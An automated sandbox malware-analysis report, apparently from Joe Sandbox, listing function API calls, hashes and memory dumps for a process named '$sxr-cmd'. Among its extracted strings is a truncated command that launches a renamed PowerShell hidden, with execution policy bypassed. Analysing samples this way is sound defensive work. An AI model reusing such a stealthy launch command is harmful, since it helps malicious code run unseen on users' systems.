                                                                                                            • Instruction Fuzzy Hash: 6C81D331600E63EAFF50AB259849BD922D3A7F578CFE444A4BA055BB96DB38C84DC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192234081-0
                                                                                                            • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                            • Instruction ID: 06ea72d9652922268fea0a0da2dac42b51bafdbc17577cb94fc726b8acb65212
                                                                                                            • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                            • Instruction Fuzzy Hash: 8B319331708A418BE790AF25A44467DFB90FB89BA0F849234DE8A67795CE7DD41D8B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1673
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F168D
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1757
                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F176E
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F1788
                                                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7137F14D6,?,?,?,00007FF7137EAA22,?,?,?,00007FF7137E847E), ref: 00007FF7137F179C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Size
                                                                                                            • String ID:
                                                                                                            • API String ID: 3586862581-0
                                                                                                            • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                            • Instruction ID: c80c5c725d3ad950deabf466cf5294120e38fb49faa4ca6fd3d6b27a7422ba53
                                                                                                            • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                            • Instruction Fuzzy Hash: E9918122A09E4281EB90AF15E480278F7A4FB49BB4F958135DA6D237A4DF3DE45DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1313749407-0
                                                                                                            • Opcode ID: 68bb012136afad4bc4269743a11f9cffbd7fa22278cea90903a856b678ea36e9
                                                                                                            • Instruction ID: c617b5fa39b4f0701bb102af848a99ccec870b48395c96587fd76f3544e639cd
                                                                                                            • Opcode Fuzzy Hash: 68bb012136afad4bc4269743a11f9cffbd7fa22278cea90903a856b678ea36e9
                                                                                                            • Instruction Fuzzy Hash: 0A51A521A09E9296EB90BB119444279EA99BF4DBB0F884134DD2E277D5DF3DE44C8270
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                            • String ID:
                                                                                                            • API String ID: 920682188-0
                                                                                                            • Opcode ID: bc14161cc29778c9355453191e93d5478ea0026767946b5047b0b5c87387b74a
                                                                                                            • Instruction ID: 36fb76958ea05dd227e299bc9ae3880a8341d908e3d9c06ad381e3d08bd00ddb
                                                                                                            • Opcode Fuzzy Hash: bc14161cc29778c9355453191e93d5478ea0026767946b5047b0b5c87387b74a
                                                                                                            • Instruction Fuzzy Hash: A0518C32705F818AEB61EF20D8902E8B7A4FB88B94F848035CA4D5B754EF3DD659C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137EE00B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$FreeProcess_setjmp
                                                                                                            • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 777023205-3145142378
                                                                                                            • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                            • Instruction ID: fd14ea86407f65c5095dc6599435bcc25996b32e74b28e69a313e21c64dcaf2c
                                                                                                            • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                            • Instruction Fuzzy Hash: 70515B7094DE42C9EB90AB15A880578F6A0BF48770FE44A35D94E72764DF3EA46CC630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit$iswspacewcschr
                                                                                                            • String ID: )$=,;
                                                                                                            • API String ID: 1959970872-2167043656
                                                                                                            • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                            • Instruction ID: 3d5a514690a5cd4ce6a3bbbd743c254b254abf24bdfd7b369cbca0701d709c15
                                                                                                            • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                            • Instruction Fuzzy Hash: 3C41CF65E08E1786FBE47B05A484279F6A0BF19771FC25231C98D329A0DF3CA46D8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                            • API String ID: 3625580822-2781220306
                                                                                                            • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                            • Instruction ID: 4c5f797e4aaab1a902d134f7b0a9fcd0ec206b06169695e26bf4f1578ba7e554
                                                                                                            • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                            • Instruction Fuzzy Hash: EC31B721A08E4685FBD47B52A5401B9F2A4BB45BB4F844130DD2D3B7A5DE3EE46DC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: b8076277a65db6ee59e59e4c8e143cba1ad5d806929f350c7b04949a90788a64
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: 3E31C771312E68F5FE51DB12A448FE96295FBE6BA9F990555FD1E07344EF38C0488310
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: 608acbce308d45dc818a1acd36c121e4531e78bb6e5feb4adca1b05f3d9a0338
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: 4E119332311F50D6FB508B42F868B99A6A1F7E8BE8F804254FA1D87798DF3CC4488740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcsspn
                                                                                                            • String ID:
                                                                                                            • API String ID: 3809306610-0
                                                                                                            • Opcode ID: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                            • Instruction ID: cf77d447f2d09ef8b22e3ed108edfa85b6b4991d45f691c0f4aa8bcab8e14edb
                                                                                                            • Opcode Fuzzy Hash: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                            • Instruction Fuzzy Hash: DFB1E166A08F4686EB90EF15E490279E7A4FB48BA0FC18031DA5E63790DF7DD84DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: c9cf3e6db11516b911fe23d97aa86dd2a3aef80fbbf3b71b7bd4725a1779a513
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 2AD1EC36209F58D1EE308B1AE49479AB7A1F3D9B89F500152EACE47BA5CF3CC545CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$iswdigit$wcstol
                                                                                                            • String ID:
                                                                                                            • API String ID: 3841054028-0
                                                                                                            • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                            • Instruction ID: 4eb5568065147ee3debd9084fc9a454ccca16ff2bc5d6be8c51cc69056defc85
                                                                                                            • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                            • Instruction Fuzzy Hash: F851F827A14D5286E7A0AB1594101B9BAE1FF687B0FC48331DE6D572D4DF3EE4A9C230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF713803687
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF7138036A6
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF7138036EB
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF713803703
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF713803722
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$Write_get_osfhandle$Mode
• String ID:
• API String ID: 1066134489-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $sxr
• API String ID: 756756679-21942930
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
  • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
  • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
  • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
  • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
  • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F3514
• _get_osfhandle.MSVCRT ref: 00007FF7137F3522
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F3541
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F355E
  • Part of subcall function 00007FF7137F36EC: _get_osfhandle.MSVCRT ref: 00007FF7137F3715
  • Part of subcall function 00007FF7137F36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F3770
  • Part of subcall function 00007FF7137F36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3791
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
• String ID:
• API String ID: 4057327938-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
• API String ID: 411561164-4129271751
Uniqueness

Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0212
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0228
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F023C
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0251
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF7137F3584
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
